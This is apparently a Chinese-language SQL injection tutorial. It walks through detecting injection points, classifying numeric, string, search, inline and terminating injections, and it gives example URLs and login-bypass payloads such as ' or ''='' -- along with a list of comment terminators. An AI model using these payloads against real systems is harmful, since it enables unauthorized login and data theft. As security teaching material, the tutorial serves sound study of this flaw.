簡介:

SQL注入漏洞產生的原因

SQL Injection

程式設計師在編寫程式碼的時候，沒有對使用者輸入資料的合法性進行判斷，使應用程式存在安全隱患
使用者可以提交一段資料庫查詢程式碼，根據程式返回的結果，獲得某些他想得知的資料或進行資料庫操作

SQL語句

Structured Query Language

結構化的查詢語言，是關係型資料庫通訊的標準語言。

查詢：SELECT statement FROM table WHERE condition
刪除記錄：DELETE FROM table WHERE condition
更新記錄：UPDATE table SET field=value WHERE condtion

新增記錄：INSERT INTO table field VALUES(values)

SQL注入攻擊流程

1. 判斷注入點

2. 判斷注入點型別

3. 判斷資料庫型別

4. 獲取資料庫資料庫，提權

1. 判斷SQL注入點

找注入點是最關鍵,也最基礎的一個環節

本質原理是:

找一個需要後臺處理後
提交給資料庫的點
所有的輸入只要和資料庫進行互動的，都有可能觸發SQL注入

一般為三大類

Get引數觸發SQL注入
POST引數觸發SQL注入
Cookie觸發SQL注入

例如:

在常規的連結的引數中(連結?引數) 找形如?id=num的,搜尋框 的 ,

而驗證是否存在注入點的方法有很多種
最常規,也最簡單的方法，引入單引號判斷是否存在注入點

http://host/test.php?id=100’

返回錯誤說明有可能注入

http://host/test.php?id=100 and 1=1 返回正常

http://host/test.php?id=100 and 1=2返回錯誤

如果滿足上面三點，是注入點的可能性就很高了

找到注入點之後就是

2.判斷注入型別

0x01 數字型注入點

測試方法：

http://host/test.php?id=100 and 1=1 返回成功

http://host/test.php?id=100 and 1=2 返回失敗

為什麼第一個會返回成功，而第二個是返回失敗呢？

原因如下：

假設我們網站的SQL查詢的語句是這樣的
SELECT * FROM news WHERE id=$id
這裡的$id是使用者提交的

當我們輸入的是
100 and 1=1
語句就變成了這樣
SELECT * FROM news WHERE id=100 and 1=1

這個SQL語句and左邊是返回成功的，因為我們是在有這個id的情況下後面加上我們的注入語句，如果這個id不存在，那就沒法測試了

而在and右邊，1=1也是恆成立的，所以整個語句返回的是成功

當然，如果後面改成了1=2的話，因為1=2是不成立的，and語句的判斷邏輯是隻要有一個不成立，就返回失敗，所以1=2最後會返回的是失敗

0x02 字元型注入點
測試方法：

http://host/test.php?name=man' and '1'='1 返回成功

http://host/test.php?name=man' and '1'='2返回失敗

這裡就使上面的數字型變為了字元型

原因如下：

還是假設我們網站的SQL語句是這樣的
SELECT * FROM news WHERE name='$name'
當我們構造輸入為下面這個的時候
man' and '1'='1
語句就變成了
SELECT * FROM news WHERE name='man' and '1'='1'

發現什麼了沒？這個SQL已經閉合了

還是一樣的，這裡and的左邊是一定成立的，而and右邊也是一樣的成立，所以and邏輯之後，整個語句返回成功
同理可知如果後面是1'='2就會返回失敗，當然，這裡不一定非要是1或者2，因為是字元型，所以我們可以輸入任何字元

比如這樣

http://host/test.php?name=man' and 'a'='a 返回成功
http://host/test.php?name=man' and 'a'='b返回失敗

0x03 搜尋型注入點 — 目前常見的

測試方法

http://host//test.php?keyword=python%' and 1=1 and '%'='

http://host//test.php?keyword=python%' and 1=2 and '%'='

假設我們的SQL查詢語句是這樣的

SELECT * FROM news WHERE keyword like '%$keyword%'

這裡的$keyword是使用者的輸入

當我們輸入以下語句的時候
pt%' and 1=1 and '%'='
最終我們得到的語句是這樣的
SELECT * FROM news WHERE keyword like '%pt%' and 1=1 and '%'='%'
這個語句又一次的閉合了

這裡我們再分析以下，因為是and邏輯，只要有一個錯誤，就返回錯誤

我們可以把這個語句分為三段

SELECT * FROM news WHERE keyword like '%python%'

and 1=1

and '%'='%'

第一行的語句肯定是成功（再強調一遍，我們要在存在的查詢上構造SQL注入）

第二句也是，第三句也是，因為自己肯定等於自己啊

但是如果我們把第二句換成1=2，那麼這個語句肯定就會返回失敗了，就是這個原理

0x04 內聯式SQL注入 –常用

內聯注入是指查詢注入SQL程式碼後，原來的查詢仍然全部執行

假設我們的網站SQL查詢語句是這樣的

SELECT * FROM admin WHER username='$name' AND password ='$passwd'

這一看就是個登入頁面的程式碼

假如我們構造如下語句提交到登入框中的username

' or ''='

或者提交到password框裡面，這兩種提交方法是不一樣的，我們下面就來分析一下這兩個提交方法

提交到username我們的語句就會成為這樣

SELECT * FROM admin WHER username='' or ''='' AND password ='fuzz'

fuzz是我們隨便輸入的字串

而提交到password則會是這樣的

SELECT * FROM admin WHER username='fuzz' AND password ='' or ''=''

注:

在SQL語句中，AND的優先順序是大於OR的
先計算AND，然後計算OR，所以這裡我們的語句會被OR分為兩段SQL語句

這是username框的

SELECT * FROM admin WHER username=''

or

''='' AND password ='fuzz'

或者password框的是這樣

SELECT * FROM admin WHER username='fuzz' AND password =''

or

''=''

我們首先用第一個來分析

首先計算AND之後

SELECT * FROM admin WHER username=''返回失敗

or

''='' AND password ='fuzz'返回失敗

資料庫是不會存在username為NULL的欄位的，所以第一句返回的是失敗，第三句中，因為password是我們隨便輸入的，99.99%是不會存在這個密碼的，於是AND之後，我們的第三句也是失敗的，所以整個語句返回失敗的

但是我們的password情況就不一樣了

SELECT * FROM admin WHER username='fuzz' AND password =''

or

''=''

這裡我們第一句是返回失敗的，但是我們的第二句''=''是返回成功的，OR邏輯是有一個是成功就返回成功，於是我們的整個語句就會返回成功

返回成功之後我們就會繞過登入表單直接登入系統了

0x05 終止式SQL注入 —常用

終止式SQL語句注入是指攻擊者在注入SQL程式碼時，通過註釋剩下的查詢來成功結束該語句

於是被註釋的查詢不會被執行，我們還是拿上面那個例子舉例

我們上面已經知道，在username框內填入

' or ''='

程式是不會返回成功的，我們就沒有辦法在username做文章了嗎？

錯了，我們還有終止式

還是上面那個SQL查詢語句

SELECT * FROM admin WHER username='$name' AND password ='$passwd'

這裡我們構造如下username輸入

' or ''='' --

之後我們就可以得到如下的查詢語句

SELECT * FROM admin WHER username='' or ''='' --' AND password ='fuzz'

這裡的fuzz是我們隨便輸入的，--是註釋符

這樣，我們的語句就可以分為三個部分了

SELECT * FROM admin WHER username=''

or ''='' 返回成功

--' AND password ='fuzz'

第一句肯定是返回失敗的，但是我們第二句會返回成功

後面已經被我們註釋掉了，是不會執行的，所以我們還是可以通過在username做這個手腳來繞過登入

下面是我們常見的一些終止方式

終止字串：

-- ， #， %23， %00， /*

終止方法：

-- , ‘-- , ‘)-- , ) -- , ‘)) --, ))--